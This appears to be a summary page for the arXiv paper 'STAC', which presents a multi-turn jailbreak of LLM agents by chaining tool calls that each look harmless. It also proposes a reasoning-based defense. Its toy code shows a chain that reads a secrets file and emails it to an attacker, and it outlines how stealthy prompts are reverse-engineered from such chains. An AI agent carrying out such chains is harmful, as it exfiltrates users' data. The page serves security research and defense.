
STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents

Jing-Jing Li 1,2, Jianfeng He 1, Chao Shang 1, Devang Kulshreshtha 1, Xun Xian 1, Yi Zhang 1, Hang Su 1, Sandesh Swamy 1, Yanjun Qi 1

4 citations · 47 references · arXiv


Published on arXiv: 2509.25624

Insecure Plugin Design (OWASP LLM Top 10 — LLM07)

Prompt Injection (OWASP LLM Top 10 — LLM01)

Key Finding

STAC achieves attack success rates exceeding 90% on GPT-4.1 and other state-of-the-art LLM agents, while existing prompt-based defenses provide limited protection and the proposed reasoning-driven defense cuts ASR by up to 28.8%.

STAC (Sequential Tool Attack Chaining)

Novel technique introduced


As LLMs advance into autonomous agents with tool-use capabilities, they introduce security challenges that extend beyond traditional content-based LLM safety concerns. This paper introduces Sequential Tool Attack Chaining (STAC), a novel multi-turn attack framework that exploits agent tool use. STAC chains together tool calls that each appear harmless in isolation but, when combined, collectively enable harmful operations that only become apparent at the final execution step. We apply our framework to automatically generate and systematically evaluate 483 STAC cases, featuring 1,352 sets of user-agent-environment interactions and spanning diverse domains, tasks, agent types, and 10 failure modes. Our evaluations show that state-of-the-art LLM agents, including GPT-4.1, are highly vulnerable to STAC, with attack success rates (ASR) exceeding 90% in most cases. The core design of STAC's automated framework is a closed-loop pipeline that synthesizes executable multi-step tool chains, validates them through in-environment execution, and reverse-engineers stealthy multi-turn prompts that reliably induce agents to execute the verified malicious sequence. We further perform defense analysis against STAC and find that existing prompt-based defenses provide limited protection. To address this gap, we propose a new reasoning-driven defense prompt that achieves far stronger protection, cutting ASR by up to 28.8%. These results highlight a crucial gap: defending tool-enabled agents requires reasoning over entire action sequences and their cumulative effects, rather than evaluating isolated prompts or responses.
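The core failure mode the abstract describes — tool calls that each pass isolated safety checks but are harmful in combination — can be illustrated with a minimal toy sketch. This is not the paper's code; the tool names, rules, and checks below are hypothetical stand-ins chosen to show why per-call filtering misses chained attacks while sequence-level reasoning catches them.

```python
# Hypothetical sketch: per-call safety checks vs. sequence-level checks.
# Tool names and policies are illustrative, not from the paper.

def per_call_check(call):
    # Flags only calls that look harmful in isolation.
    banned = {"delete_all_files", "exfiltrate_data"}
    return call["tool"] not in banned

def sequence_check(calls):
    # Reasons over the cumulative effect of the whole chain:
    # reading a sensitive file followed by any outbound send is
    # flagged, even though every individual step passes per_call_check.
    read_sensitive = False
    for call in calls:
        if call["tool"] == "read_file" and "secret" in call["args"].get("path", ""):
            read_sensitive = True
        if call["tool"] == "send_email" and read_sensitive:
            return False  # harmful only as a chain
    return True

# A STAC-style chain: each step is innocuous on its own.
chain = [
    {"tool": "list_files", "args": {"dir": "/home/user"}},
    {"tool": "read_file", "args": {"path": "/home/user/secrets.txt"}},
    {"tool": "send_email", "args": {"to": "attacker@example.com"}},
]

per_call_ok = all(per_call_check(c) for c in chain)  # each step looks benign
chain_ok = sequence_check(chain)                     # cumulative effect is harmful
```

Running this, the per-call filter accepts every step while the sequence-level check rejects the chain — the gap the paper's defense analysis highlights.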


Key Contributions

  • Introduces STAC (Sequential Tool Attack Chaining), a multi-turn attack framework that chains individually harmless tool calls to achieve harmful goals only detectable at the final execution step.
  • Constructs and evaluates 483 STAC cases spanning 10 failure modes and diverse agent types, finding >90% ASR on state-of-the-art agents including GPT-4.1.
  • Proposes a reasoning-driven defense prompt that reasons over cumulative action sequences rather than isolated prompts, reducing ASR by up to 28.8%.
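The closed-loop pipeline summarized above (synthesize an executable tool chain, validate it by in-environment execution, then reverse-engineer stealthy multi-turn prompts) can be sketched in outline. Every function body here is a stand-in stub — the paper's actual implementation uses LLM-driven synthesis and real sandboxed environments, neither of which is reproduced here.

```python
# Hedged outline of a STAC-style closed-loop pipeline.
# All bodies are illustrative stubs, not the paper's implementation.

def synthesize_chain(goal):
    # Stand-in: a real system would plan concrete tool calls toward the goal.
    return [f"tool_step_{i}" for i in range(3)]

def validate_in_env(chain):
    # Stand-in: execute each call in a sandboxed environment and confirm
    # the final state actually realizes the harmful goal.
    return all(step.startswith("tool_step_") for step in chain)

def reverse_engineer_prompts(chain):
    # Stand-in: derive one innocuous-looking user turn per verified tool call,
    # so the agent is induced to execute the chain step by step.
    return [f"Could you run {step} for me?" for step in chain]

def build_stac_case(goal, max_attempts=3):
    # Closed loop: re-synthesize until a chain validates, then emit prompts.
    for _ in range(max_attempts):
        chain = synthesize_chain(goal)
        if validate_in_env(chain):
            return reverse_engineer_prompts(chain)
    return None

prompts = build_stac_case("hypothetical harmful goal")
```

The design point is the validation step: because prompts are reverse-engineered only from chains already verified to execute, the resulting multi-turn attacks are reliable by construction.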

🛡️ Threat Analysis


Details

Domains
nlp
Model Types
llm
Threat Tags
black_box · inference_time · targeted
Datasets
STAC benchmark (483 cases, 1,352 user-agent-environment interactions, custom)
Applications
llm agents · tool-enabled autonomous agents · file management agents